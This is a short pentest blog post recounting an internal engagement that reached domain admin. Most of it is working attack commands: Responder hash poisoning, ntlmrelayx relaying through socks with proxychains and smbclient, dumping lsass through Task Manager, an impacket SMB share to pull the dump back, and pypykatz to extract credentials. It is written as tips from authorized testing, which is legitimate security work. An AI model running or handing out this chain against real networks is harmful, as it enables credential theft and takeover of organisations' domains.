Jul 15, 2020
This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:
Responder.py -i eth0 -rPv
is AWESOME. It can
make the network rain hashes like manna from heaven! smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10
Then save that as your targets.txt and run
ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks
-smb2support
. From there, once you get active socks
connections, you can connect to them directly with a full
interactive shell with something like proxychains
smbclient //192.168.195.2/ -U CORP/brian.admin
I ran into a weird issue with CrackMapExec where
the --local-auth
flag didn't seem to be
working so I ended up trying the binary
version and then it worked like a champ!
Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
Wanna spin up a quick SMB share from your Kali box?
Try smbserver.py -smb2support share /share
Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:
pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt
Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!